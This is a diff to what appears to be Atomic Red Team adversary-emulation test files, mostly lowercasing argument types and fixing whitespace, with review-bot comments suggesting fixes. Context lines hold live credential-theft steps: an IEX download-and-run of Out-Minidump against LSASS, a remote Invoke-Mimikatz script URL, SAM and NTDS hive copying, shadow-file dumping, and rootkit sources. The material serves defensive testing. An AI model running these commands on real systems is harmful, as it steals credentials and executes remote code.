diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 9c1fcdd6..f6ff35f9 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -15,11 +15,11 @@ atomic_tests: input_arguments: output_file: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\lsass_dump.dmp procdump_exe: description: Path of Procdump executable - type: Path + type: path default: PathToAtomicsFolder\T1003.001\bin\procdump.exe dependency_executor_name: powershell dependencies:
@@ -69,7 +69,7 @@ atomic_tests: input_arguments: dumpert_exe: description: Path of Dumpert executable - type: Path + type: path default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe dependency_executor_name: powershell dependencies:
@@ -88,12 +88,12 @@ atomic_tests: del C:\windows\temp\dumpert.dmp >nul 2> nul name: command_prompt elevation_required: true - + - name: Dump LSASS.exe Memory using NanoDump auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea description: | The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. - + https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory
@@ -146,11 +146,11 @@ atomic_tests: input_arguments: input_file: description: Path of the Lsass dump - type: Path + type: path default: '%tmp%\lsass.DMP' mimikatz_exe: description: Path of the Mimikatz binary - type: String + type: string default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe dependency_executor_name: powershell dependencies:
@@ -224,8 +224,8 @@ atomic_tests: - windows executor: command: | - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: | Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore name: powershell
@@ -244,11 +244,11 @@ atomic_tests: input_arguments: output_file: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\lsass_dump.dmp procdump_exe: description: Path of Procdump executable - type: Path + type: path default: PathToAtomicsFolder\T1003.001\bin\procdump.exe dependency_executor_name: powershell dependencies:
@@ -280,7 +280,7 @@ atomic_tests: input_arguments: remote_script: description: URL to a remote Mimikatz script that dumps credentials - type: Url + type: url default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1 executor: command: |
@@ -291,7 +291,7 @@ atomic_tests: auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 description: | Use createdump executable from .NET to create an LSASS dump. - + [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20) supported_platforms: - windows
@@ -311,7 +311,7 @@ atomic_tests: cleanup_command: | Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore name: powershell - elevation_required: true + elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 description: |
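Review bot: The Out-Minidump line re-emitted on the new side of the @@ -224 hunk still fetches from the mutable `master` ref of a third-party repository and hands the result straight to `IEX`, while the `remote_script` default in the @@ -280 hunk of the same file pins Invoke-Mimikatz to commit f650520c4b1004daf8b3ec08007a0b945b91253a. Pinning this fetch the same way (or exposing it as an input argument of `type: url` with a pinned default, as @@ -280 does) keeps the test reproducible and means an upstream change cannot silently alter what runs on the test host. Suggested form: `IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/<PINNED_COMMIT_SHA>/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump`, with `<PINNED_COMMIT_SHA>` replaced by the reviewed revision. The test's name and description start before this hunk.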
@@ -325,11 +325,11 @@ atomic_tests: input_arguments: xordump_exe: description: Path to xordump - type: Path + type: path default: C:\Windows\Temp\xordump.exe output_file: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp dependencies: - description: |
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index bd20f50d..158ff58a 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -66,15 +66,15 @@ atomic_tests: input_arguments: file_path: description: Path to the file to copy - type: Path + type: path default: '%SystemRoot%/system32/config/SAM' file_name: description: Name of the copied file - type: String + type: string default: SAM copy_dest: description: Destination of the copied file - type: String + type: string default: '%temp%' executor: command: |
@@ -83,7 +83,7 @@ atomic_tests: elevation_required: true cleanup_command: | del #{copy_dest}\#{file_name} >nul 2>&1 - + - name: PowerDump Hashes and Usernames from Registry auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hashes from the registry.
@@ -112,17 +112,17 @@ atomic_tests: input_arguments: target_hive: description: Hive you wish to dump - type: String + type: string default: SAM limit: description: Limit to the number of shadow copies to iterate through when trying to copy the hive - type: Integer + type: integer default: 10 executor: command: | for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) && dir /B %temp%\#{target_hive}vss%a name: command_prompt - elevation_required: false + elevation_required: false cleanup_command: | for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
@@ -135,11 +135,11 @@ atomic_tests: input_arguments: target_hive: description: Hive you wish to dump - type: String + type: string default: SAM limit: description: Limit to the number of shadow copies to iterate through when trying to copy the hive - type: Integer + type: integer default: 10 executor: command: |
@@ -148,12 +148,12 @@ atomic_tests: ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore } name: powershell - elevation_required: false + elevation_required: false cleanup_command: | 1..#{limit} | % { rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore } - + - name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 83c266aa..02bb903f 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -12,7 +12,7 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon) - type: String + type: string default: 'C:' dependencies: - description: |
@@ -42,11 +42,11 @@ atomic_tests: input_arguments: vsc_name: description: Name of Volume Shadow Copy - type: String + type: string default: '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1' extract_path: description: Path for extracted NTDS.dit - type: Path + type: path default: C:\Windows\Temp dependencies: - description: |
@@ -94,7 +94,7 @@ atomic_tests: input_arguments: output_folder: description: Path where resulting dump should be placed - type: Path + type: path default: C:\Windows\Temp\ntds_T1003 dependencies: - description: |
@@ -123,7 +123,7 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon and backslash) - type: String + type: string default: 'C:\' dependencies: - description: |
@@ -148,11 +148,11 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon and backslash) - type: String + type: string default: 'C:\' target_host: description: IP Address / Hostname you want to target - type: String + type: string default: localhost dependencies: - description: |
@@ -177,15 +177,15 @@ atomic_tests: input_arguments: source_path: description: File to shadow copy - type: String + type: string default: 'c:\windows\ntds\ntds.dit' target_path: description: Target path of the result file - type: String + type: string default: 'c:\ntds.dit' target_host: description: IP Address / Hostname you want to target - type: String + type: string default: localhost dependencies: - description: |
@@ -211,7 +211,7 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon) - type: String + type: string default: 'C:\' executor: command: |
@@ -230,11 +230,11 @@ atomic_tests: input_arguments: drive_letter: description: Drive letter to source VSC (including colon) - type: String + type: string default: 'C:' symlink_path: description: symlink path - type: String + type: string default: 'C:\Temp\vssstore' executor: command: |
diff --git a/atomics/T1003.004/T1003.004.yaml b/atomics/T1003.004/T1003.004.yaml
index ee5b43a5..a2c915c1 100644
--- a/atomics/T1003.004/T1003.004.yaml
+++ b/atomics/T1003.004/T1003.004.yaml
@@ -13,7 +13,7 @@ atomic_tests: input_arguments: psexec_exe: description: Path to PsExec executable - type: Path + type: path default: PathToAtomicsFolder\T1003.004\bin\PsExec.exe dependency_executor_name: powershell dependencies:
diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml
index 0020c7f2..f1342c9d 100644
--- a/atomics/T1003.006/T1003.006.yaml
+++ b/atomics/T1003.006/T1003.006.yaml
@@ -9,19 +9,19 @@ atomic_tests: Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) supported_platforms: - - windows + - windows input_arguments: domain: description: Targeted Active Directory domain - type: String + type: string default: '%userdnsdomain%' user: description: Targeted user - type: String + type: string default: krbtgt mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '%tmp%\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies:
@@ -56,7 +56,7 @@ atomic_tests: input_arguments: logonserver: description: ComputerName argument default %logonserver% - type: String + type: string default: $ENV:logonserver.TrimStart("\") dependency_executor_name: powershell dependencies:
@@ -72,4 +72,4 @@ atomic_tests: command: | Get-ADReplAccount -All -Server #{logonserver} name: powershell - elevation_required: False \ No newline at end of file + elevation_required: false
diff --git a/atomics/T1003.007/T1003.007.yaml b/atomics/T1003.007/T1003.007.yaml
index a5bcee80..84a02bd2 100644
--- a/atomics/T1003.007/T1003.007.yaml
+++ b/atomics/T1003.007/T1003.007.yaml
@@ -1,4 +1,3 @@ ---- attack_technique: T1003.007 display_name: 'OS Credential Dumping: Proc Filesystem' atomic_tests:
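Review bot: Dropping the `---` document-start marker from T1003.007.yaml in the @@ -1,4 +1,3 hunk goes against yamllint's default `document-start` rule, and nothing in this diff shows whether the other atomic files omit it. If the intent is uniformity with the rest of the `atomics/` tree, that is worth stating in the commit message and, where a yamllint configuration is in use, disabling `document-start` there so the linter does not re-flag every file; otherwise the marker is better kept. The remaining lines of the hunk (`attack_technique`, `display_name`, `atomic_tests`) are unchanged context.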
@@ -9,31 +8,31 @@ atomic_tests: copy process memory to an external file so it can be searched or exfiltrated later. supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.007.bin script_path: description: Path to script generating the target process - type: Path + type: path default: /tmp/T1003.007.sh pid_term: description: Unique string to use to identify target process - type: String + type: string default: T1003.007 dependencies: - - description: | - Script to launch target process must exist - prereq_command: | - test -f #{script_path} - grep "#{pid_term}" #{script_path} - get_prereq_command: | - echo '#!/bin/sh' > #{script_path} - echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} executor: name: sh 
@@ -57,41 +56,41 @@ atomic_tests: copy a process's heap memory to an external file so it can be searched or exfiltrated later. supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.007.bin script_path: description: Path to script generating the target process - type: Path + type: path default: /tmp/T1003.007.sh python_script: description: Path to script generating the target process - type: Path + type: path default: PathToAtomicsFolder/T1003.007/src/dump_heap.py pid_term: description: Unique string to use to identify target process - type: String + type: string default: T1003.007 dependencies: - - description: | - Script to launch target process must exist - prereq_command: | - test -f #{script_path} - grep "#{pid_term}" #{script_path} - get_prereq_command: | - echo '#!/bin/sh' > #{script_path} - echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - - description: | - Requires Python - prereq_command: | - (which python || which python3 || which python2) - get_prereq_command: | - echo "Python 2.7+ or 3.4+ must be installed" + - description: | + Script to launch target process must exist + prereq_command: | + test -f #{script_path} + grep "#{pid_term}" #{script_path} + get_prereq_command: | + echo '#!/bin/sh' > #{script_path} + echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} + - description: | + Requires Python + prereq_command: | + (which python || which python3 || which python2) + get_prereq_command: | + echo "Python 2.7+ or 3.4+ must be installed" executor: name: sh 
@@ -116,11 +115,11 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.007Test3.txt MimiPenguin_Location: description: Path of MimiPenguin script - type: Path + type: path default: /tmp/mimipenguin/mimipenguin_2.0-release/mimipenguin.sh dependency_executor_name: sh dependencies:
diff --git a/atomics/T1003.008/T1003.008.yaml b/atomics/T1003.008/T1003.008.yaml
index 491690de..cc5d1454 100644
--- a/atomics/T1003.008/T1003.008.yaml
+++ b/atomics/T1003.008/T1003.008.yaml
@@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: |
@@ -29,7 +29,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: |
@@ -43,11 +43,11 @@ atomic_tests: description: | Dump /etc/passwd and /etc/shadow using ed supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: |
@@ -61,11 +61,11 @@ atomic_tests: description: | Dump /etc/passwd and /etc/shadow using bash builtins supported_platforms: - - linux + - linux input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1003.008.txt executor: command: |
diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index ffb5bb7e..5d7c6fec 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -18,15 +18,15 @@ atomic_tests: input_arguments: gsecdump_exe: description: Path to the Gsecdump executable - type: Path + type: path default: PathToAtomicsFolder\T1003\bin\gsecdump.exe gsecdump_bin_hash: description: File hash of the Gsecdump binary file - type: String + type: string default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC gsecdump_url: description: Path to download Gsecdump binary file - type: Url + type: url default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe dependency_executor_name: powershell dependencies:
@@ -58,7 +58,7 @@ atomic_tests: - windows dependency_executor_name: powershell dependencies: - - description: NPPSpy.dll must be available in local temp directory + - description: NPPSpy.dll must be available in local temp directory prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} get_prereq_command: |- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -85,13 +85,13 @@ atomic_tests: Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore name: powershell elevation_required: true - + - name: Dump svchost.exe to gather RDP credentials auto_generated_guid: d400090a-d8ca-4be0-982e-c70598a23de9 description: | The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ - + Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. supported_platforms: - windows
@@ -107,8 +107,8 @@ atomic_tests: - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) auto_generated_guid: 6c7a4fd3-5b0b-4b30-a93e-39411b25d889 description: |- - AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. - [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) + AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. + [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) supported_platforms: - windows dependency_executor_name: powershell
@@ -127,8 +127,8 @@ atomic_tests: - name: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) auto_generated_guid: 42510244-5019-48fa-a0e5-66c3b76e6049 description: |- - AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. - [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) + AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. + [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA) supported_platforms: - windows dependency_executor_name: powershell
diff --git a/atomics/T1006/T1006.yaml b/atomics/T1006/T1006.yaml
index 7ce8480f..286785c3 100644
--- a/atomics/T1006/T1006.yaml
+++ b/atomics/T1006/T1006.yaml
@@ -18,7 +18,7 @@ atomic_tests: input_arguments: volume: description: Drive letter of the volume to access - type: String + type: string default: 'C:' executor: command: |
diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml
index ea8990aa..d439a2f3 100644
--- a/atomics/T1007/T1007.yaml
+++ b/atomics/T1007/T1007.yaml
@@ -27,7 +27,7 @@ atomic_tests: input_arguments: output_file: description: Path of file to hold net.exe output - type: Path + type: path default: '%temp%\service-list.txt' executor: command: |
diff --git a/atomics/T1010/T1010.yaml b/atomics/T1010/T1010.yaml
index 79b63730..858ff811 100644
--- a/atomics/T1010/T1010.yaml
+++ b/atomics/T1010/T1010.yaml
@@ -12,11 +12,11 @@ atomic_tests: input_arguments: input_source_code: description: Path to source of C# code - type: Path + type: path default: PathToAtomicsFolder\T1010\src\T1010.cs output_file_name: description: Name of output binary - type: String + type: string default: '%TEMP%\T1010.exe' dependency_executor_name: powershell dependencies:
diff --git a/atomics/T1012/T1012.yaml b/atomics/T1012/T1012.yaml
index d2d87354..81c0ae69 100644
--- a/atomics/T1012/T1012.yaml
+++ b/atomics/T1012/T1012.yaml
@@ -39,15 +39,15 @@ atomic_tests: - name: Enumerate COM Objects in Registry with Powershell auto_generated_guid: 0d80d088-a84c-4353-af1a-fc8b439f1564 description: |- - This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file. - An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. - See: https://www.mandiant.com/resources/hunting-com-objects + This test is designed to enumerate the COM objects listed in HKCR, then output their methods and CLSIDs to a text file. + An adversary could then use this information to identify COM objects that might be vulnerable to abuse, such as using them to spawn arbitrary processes. + See: https://www.mandiant.com/resources/hunting-com-objects supported_platforms: - windows input_arguments: output_file: description: File to output list of COM objects to - type: String + type: string default: $env:temp\T1592.002Test1.txt executor: command: |
diff --git a/atomics/T1014/T1014.yaml b/atomics/T1014/T1014.yaml
index a5cd297f..7b0483a0 100644
--- a/atomics/T1014/T1014.yaml
+++ b/atomics/T1014/T1014.yaml
@@ -10,15 +10,15 @@ atomic_tests: input_arguments: rootkit_source_path: description: Path to the rootkit source. Used when prerequistes are fetched. - type: Path + type: path default: PathToAtomicsFolder/T1014/src/Linux rootkit_path: description: Path To rootkit - type: String + type: string default: PathToAtomicsFolder/T1014/bin rootkit_name: description: Module name - type: String + type: string default: T1014 dependency_executor_name: bash dependencies:
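Review bot: In the T1014 @@ -10 hunk `rootkit_path` keeps `type: string` after the case normalisation even though its description is `Path To rootkit` and its sibling `rootkit_source_path` in the same stanza uses `type: path`; the same mismatch appears in the @@ -52 and @@ -135 hunks of this file, and `file` in the T1020 @@ -12 hunk (`Exfiltration File`, default `C:\temp\T1020_exfilFile.txt`) is likewise typed `string`. Since this commit already touches every `type:` line, it is the natural place to make the path-valued arguments consistent, i.e. `rootkit_path:` / `description: Path To rootkit` / `type: path`. Whether the runner treats `path` differently from `string` (path-separator handling, for example) is not visible here; if it does, the change is more than cosmetic, so confirm before applying it.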
@@ -52,15 +52,15 @@ atomic_tests: input_arguments: rootkit_source_path: description: Path to the rootkit source. Used when prerequistes are fetched. - type: Path + type: path default: PathToAtomicsFolder/T1014/src/Linux rootkit_path: description: Path To rootkit - type: String + type: string default: PathToAtomicsFolder/T1014/bin rootkit_name: description: Module name - type: String + type: string default: T1014 dependency_executor_name: bash dependencies:
@@ -95,15 +95,15 @@ atomic_tests: input_arguments: repo: description: Url of the github repo zip - type: String + type: string default: https://github.com/gianlucaborello/libprocesshider/ rev: description: Revision of the github repo zip - type: String + type: string default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415 library_path: description: Full path of the library to add to ld.so.preload - type: String + type: string default: /usr/local/lib/libprocesshider.so dependency_executor_name: bash dependencies:
@@ -135,19 +135,19 @@ atomic_tests: input_arguments: repo: description: Url of the diamorphine github repo - type: String + type: string default: https://github.com/m0nad/Diamorphine/ rev: description: Revision of the github repo zip - type: String + type: string default: 898810523aa2033f582a4a5903ffe453334044f9 rootkit_path: description: Path To rootkit - type: String + type: string default: /tmp/atomic/Diamorphine rootkit_name: description: Module name - type: String + type: string default: diamorphine dependency_executor_name: bash dependencies:
diff --git a/atomics/T1016/T1016.yaml b/atomics/T1016/T1016.yaml
index f1752424..7487524c 100644
--- a/atomics/T1016/T1016.yaml
+++ b/atomics/T1016/T1016.yaml
@@ -80,15 +80,15 @@ atomic_tests: input_arguments: output_file: description: Path of file to write port scan results - type: Path + type: path default: $env:USERPROFILE\Desktop\open-ports.txt portfile_url: description: URL to top-128.txt - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt port_file: description: The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap. - type: Path + type: path default: PathToAtomicsFolder\T1016\src\top-128.txt dependency_executor_name: powershell dependencies:
@@ -132,7 +132,7 @@ atomic_tests: name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms:
@@ -140,7 +140,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies:
@@ -163,7 +163,7 @@ atomic_tests: input_arguments: recon_commands: description: File that houses list of commands to be executed - type: Path + type: path default: PathToAtomicsFolder\T1016\src\qakbot.bat dependency_executor_name: powershell dependencies:
@@ -182,9 +182,9 @@ atomic_tests: auto_generated_guid: ff1d8c25-2aa4-4f18-a425-fede4a41ee88 description: | "This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. - + Using `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\"Is it on or off?\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. - + Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. supported_platforms: - macos
@@ -203,5 +203,5 @@ atomic_tests: - windows executor: command: | - nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN + nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN name: command_prompt
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index 29038945..37f06d8d 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -37,7 +37,7 @@ atomic_tests: input_arguments: target_domain: description: Domain to query for domain controllers - type: String + type: string default: '%userdnsdomain%' executor: command: |
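Review bot: The line re-emitted in the T1016 @@ -203 hunk, `nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN`, runs under `name: command_prompt`, but `$env:USERDNSDOMAIN` is PowerShell syntax; cmd.exe passes it through literally, so the lookup is sent for `_ldap._tcp.dc._msdcs.$env:USERDNSDOMAIN` rather than the host's domain. Either use the cmd.exe form `nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.%USERDNSDOMAIN%` or switch the executor to `name: powershell`. The enclosing test's name and description begin before this hunk.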
@@ -51,21 +51,21 @@ atomic_tests: Upon successful execution, cmd.exe will perform a for loop against the 192.168.1.1/24 network. Output will be via stdout. supported_platforms: - windows - input_arguments: - start_host: - description: Last octet starting value for ping sweep. - type: String - default: "1" - stop_host: - description: Last octet ending value for ping sweep. - type: String - default: "254" - subnet: - description: Subnet used for ping sweep. - type: String - default: 192.168.1 - executor: - command: | + input_arguments: + start_host: + description: Last octet starting value for ping sweep. + type: string + default: "1" + stop_host: + description: Last octet ending value for ping sweep. + type: string + default: "254" + subnet: + description: Subnet used for ping sweep. + type: string + default: 192.168.1 + executor: + command: | for /l %i in (#{start_host},1,#{stop_host}) do ping -n 1 -w 100 #{subnet}.%i name: command_prompt - name: Remote System Discovery - arp
@@ -113,15 +113,15 @@ atomic_tests: input_arguments: start_host: description: Subnet used for ping sweep. - type: String + type: string default: "1" stop_host: description: Subnet used for ping sweep. - type: String + type: string default: "254" subnet: description: Subnet used for ping sweep. - type: String + type: string default: 192.168.1 executor: command: |
@@ -156,15 +156,15 @@ atomic_tests: input_arguments: user_name: description: username including domain. - type: String + type: string default: 'domain\user' acct_pass: description: Account password. - type: String + type: string default: "password" host_name: description: hostname or ip address to connect to. - type: String + type: string default: "192.168.1.1" dependency_executor_name: powershell dependencies:
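Review bot: In the @@ -113 hunk the `start_host` and `stop_host` arguments are both documented as `Subnet used for ping sweep.`, which is the `subnet` argument's text copied across; the @@ -51 hunk of this file has the correct wording for the same pair. Change them to `description: Last octet starting value for ping sweep.` and `description: Last octet ending value for ping sweep.` so the three arguments are distinguishable in generated docs and in the runner's prompts. The enclosing test begins before this hunk.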
@@ -193,7 +193,7 @@ atomic_tests: elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects auto_generated_guid: a889f5be-2d54-4050-bd05-884578748bb4 - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Computer Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms:
@@ -201,7 +201,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies:
@@ -217,7 +217,7 @@ atomic_tests: name: command_prompt - name: Adfind - Enumerate Active Directory Domain Controller Objects auto_generated_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e - description: | + description: | Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Domain Controller Objects reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html supported_platforms:
@@ -225,7 +225,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies:
@@ -307,9 +307,9 @@ atomic_tests: - windows dependency_executor_name: powershell dependencies: - - description: This PC must be joined to a domain. + - description: This PC must be joined to a domain. prereq_command: |- - if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1} + if ((Get-WmiObject -Class Win32_ComputerSystem).partofdomain -eq $true) {exit 0} else {exit 1} get_prereq_command: |- write-host "This PC must be manually added to a domain." executor:
@@ -373,7 +373,7 @@ atomic_tests: elevation_required: false command: | get-wmiobject -class ds_computer -namespace root\directory\ldap -- name: Remote System Discovery - net group Domain Controller +- name: Remote System Discovery - net group Domain Controller auto_generated_guid: 5843529a-5056-4bc1-9c13-a311e2af4ca0 description: | Identify remote systems with net.exe querying the Active Directory Domain Controller.
diff --git a/atomics/T1020/T1020.yaml b/atomics/T1020/T1020.yaml
index 56d638a0..8b6959ae 100644
--- a/atomics/T1020/T1020.yaml
+++ b/atomics/T1020/T1020.yaml
@@ -12,11 +12,11 @@ atomic_tests: input_arguments: file: description: Exfiltration File - type: String + type: string default: C:\temp\T1020_exfilFile.txt domain: description: Destination Domain - type: Url + type: url default: https://google.com executor: command: |-
diff --git a/atomics/T1021.001/T1021.001.yaml b/atomics/T1021.001/T1021.001.yaml
index fd7f2370..f9c01a5b 100644
--- a/atomics/T1021.001/T1021.001.yaml
+++ b/atomics/T1021.001/T1021.001.yaml
@@ -10,19 +10,19 @@ atomic_tests: input_arguments: logonserver: description: ComputerName argument default %logonserver% - type: String + type: string default: $ENV:logonserver.TrimStart("\") domain: description: domain argument default %USERDOMAIN% - type: String + type: string default: $Env:USERDOMAIN username: description: Username argument default %username% - type: String + type: string default: $ENV:USERNAME password: description: Password - type: String + type: string default: 1password2! dependencies: - description: |
